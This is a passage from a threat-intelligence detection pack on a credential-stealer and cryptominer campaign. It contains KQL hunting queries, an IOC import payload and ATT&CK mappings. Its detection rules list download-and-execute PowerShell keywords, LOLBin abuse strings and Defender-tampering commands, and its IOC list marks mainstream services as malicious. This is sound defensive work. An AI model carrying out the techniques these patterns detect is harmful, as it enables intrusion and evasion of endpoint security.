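                             "jitter": round(jitter, 3)})
    return findings


if __name__ == "__main__":
    for hit in detect_beacons(build_sample_connections()):
        print(hit)
```

Run the same grouping over real Sysmon Event ID 3 exports, excluding the approved-process list from your environment, and review anything flagged against indicator 7's JA3 and URI-pattern checks before escalating.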
Indicators of Compromise (4): 3 domains, 1 URL (listed in the detection queries below).
Platform Playbook: Microsoft Sentinel / Defender
Licensing coverage: Microsoft 365 E3 (3 log sources: basic identity and audit, no endpoint advanced hunting; Defender for Endpoint requires a separate P1/P2 license). Microsoft 365 E5 (18 log sources: full Defender suite, Endpoint P2, Identity, Office 365 P2, Cloud App Security, advanced hunting across all workloads). E5 + Sentinel (27 log sources: all E5 tables plus SIEM data such as CEF, Syslog, Windows Security Events and Threat Intelligence, with analytics rules, playbooks and workbooks).
IOC Detection Queries (2)
3 domain indicator(s). Detects DNS lookups and connections.
// Threat: Triple Convergence: Weedhack, CountLoader, and Unnamed Cryptominer Target Endpoi
let malicious_domains = dynamic(["api.telegram.org", "cdn.discordapp.com", "steamcommunity.com"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_domains)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
1 URL indicator(s).
// Threat: Triple Convergence: Weedhack, CountLoader, and Unnamed Cryptominer Target Endpoi
let malicious_urls = dynamic(["https://www.youtube.com/watch?v=ssD8jKlb8ws"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_urls)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
MITRE ATT&CK Hunting Queries (9)
Sentinel rule: Suspicious PowerShell command line
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where ProcessCommandLine has_any ("-enc", "-nop", "bypass", "hidden", "downloadstring", "invoke-expression", "iex", "frombase64", "new-object net.webclient")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Unusual C2 communication patterns
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort in (80, 443, 8080, 8443)
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "teams.exe", "outlook.exe", "svchost.exe")
| summarize Connections = count() by DeviceName, RemoteIP, InitiatingProcessFileName
| where Connections > 50
| sort by Connections desc
Sentinel rule: Phishing email delivery
EmailEvents
| where Timestamp > ago(7d)
| where ThreatTypes has "Phish" or DetectionMethods has "Phish"
| summarize Attachments = make_set(AttachmentCount), Urls = make_set(UrlCount) by NetworkMessageId, Timestamp, SenderFromAddress, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation, ThreatTypes
| sort by Timestamp desc
Sentinel rule: Persistence via registry / startup
DeviceRegistryEvents
| where Timestamp > ago(7d)
| where ActionType in ("RegistryValueSet", "RegistryKeyCreated")
| where RegistryKey has_any ("\\CurrentVersion\\Run", "\\CurrentVersion\\RunOnce", "\\Winlogon\\", "\\Services\\")
| where RegistryValueData has_any (".exe", ".dll", ".bat", ".ps1", ".vbs", "cmd", "powershell", "http")
| project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Process injection / hollowing
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType in ("CreateRemoteThreadApiCall", "QueueUserApcRemoteApiCall", "WriteToLsassProcessMemory", "NtAllocateVirtualMemoryApiCall", "NtMapViewOfSectionRemoteApiCall")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName, ActionType
| sort by Timestamp desc
Sentinel rule: Security tool tampering
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any (
    "Set-MpPreference", "DisableRealtimeMonitoring",
    "net stop", "sc stop", "sc delete", "taskkill /f",
    "Add-MpPreference -ExclusionPath"
)
| where ProcessCommandLine has_any ("defender", "sense", "security", "antivirus", "firewall", "crowdstrike", "sentinel")
| project Timestamp, DeviceName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: LOLBin abuse (mshta, regsvr32, rundll32)
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "cmstp.exe", "msiexec.exe")
| where ProcessCommandLine has_any ("http", "ftp", "\\\\", "javascript:", "vbscript:", "scrobj.dll", "/i:", "-decode", "-urlcache")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Encoded command execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @"[A-Za-z0-9+/]{50,}={0,2}"
    or ProcessCommandLine has_any ("-enc ", "-encodedcommand", "frombase64string", "certutil -decode")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName
| sort by Timestamp desc
Sentinel rule: Suspicious file execution from downloads
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FolderPath has_any ("\\Downloads\\", "\\Temp\\", "\\AppData\\Local\\Temp\\")
// KQL has no endswith_any operator; match the extension with a case-insensitive regex instead
| where FileName matches regex @"(?i)\.(exe|scr|bat|ps1|vbs|js|hta|msi)$"
| where InitiatingProcessFileName in~ ("explorer.exe", "outlook.exe", "chrome.exe", "msedge.exe")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, ProcessCommandLine, AccountName
| sort by Timestamp desc
Falcon API IOC Import Payload (3 indicators)
POST to /indicators/entities/iocs/v1 — Weak/benign indicators pre-filtered. Expiration set to 90 days.
[
  {
    "type": "domain",
    "value": "api.telegram.org",
    "source": "SCC Threat Intel",
    "description": "Exfiltration channel used by Weedhack/Amatera Stealer for credential and wallet data exfiltration via Telegram Bot API",
    "severity": "medium",
    "action": "detect",
    "platforms": ["windows", "mac", "linux"],
    "applied_globally": true,
    "expiration": "2026-09-02T00:00:00Z"
  },
  {
    "type": "domain",
    "value": "cdn.discordapp.com",
    "source": "SCC Threat Intel",
    "description": "Exfiltration channel used by Weedhack campaign for stolen credential delivery via Discord webhooks",
    "severity": "medium",
    "action": "detect",
    "platforms": ["windows", "mac", "linux"],
    "applied_globally": true,
    "expiration": "2026-09-02T00:00:00Z"
  },
  {
    "type": "domain",
    "value": "steamcommunity.com",
    "source": "SCC Threat Intel",
    "description": "Exfiltration channel used by Weedhack campaign via Steam API",
    "severity": "medium",
    "action": "detect",
    "platforms": ["windows", "mac", "linux"],
    "applied_globally": true,
    "expiration": "2026-09-02T00:00:00Z"
  }
]
Route 53 DNS — Malicious Domain Resolution
Query Preview
# Route 53 Resolver query logs expose the name as query_name and record it with a
# trailing dot (e.g. "api.telegram.org."), so match both forms with a regex
fields @timestamp, query_name, srcaddr, rcode
| filter query_name like /^(api\.telegram\.org|cdn\.discordapp\.com|steamcommunity\.com)\.?$/
| sort @timestamp desc
| limit 200
Compliance Framework Mappings
MITRE ATT&CK: T1113, T1091, T1059.001, T1125, T1041, T1090 (+19 more)
NIST SP 800-53: CM-7, SI-3, SI-4, SI-7, CA-7, SC-7 (+4 more)
MITRE ATT&CK Mapping
ID         Technique                                Tactic
T1113      Screen Capture                           collection
T1091      Replication Through Removable Media      lateral-movement
T1125      Video Capture                            collection
T1041      Exfiltration Over C2 Channel             exfiltration
T1090      Proxy                                    command-and-control
T1566      Phishing                                 initial-access
T1547      Boot or Logon Autostart Execution        persistence
T1055      Process Injection                        defense-evasion
T1562.001  Disable or Modify Tools                  defense-evasion
T1027      Obfuscated Files or Information          defense-evasion
T1553      Subvert Trust Controls                   defense-evasion
T1496      Resource Hijacking                       impact
T1608.001  Upload Malware                           resource-development
T1539      Steal Web Session Cookie                 credential-access
T1112      Modify Registry                          defense-evasion
T1555      Credentials from Password Stores         credential-access
T1071      Application Layer Protocol               command-and-control
T1115      Clipboard Data                           collection
Guidance Disclaimer
The analysis, framework mappings, and incident response recommendations in this intelligence
item are derived from established industry standards including NIST SP 800-61, NIST SP 800-53,
CIS Controls v8, MITRE ATT&CK, and other recognized frameworks. This content is provided
as supplemental intelligence guidance only and does not constitute professional incident response
services. Organizations should adapt all recommendations to their specific environment, risk
tolerance, and regulatory requirements. This material is not a substitute for your organization's
official incident response plan, legal counsel, or qualified security practitioners.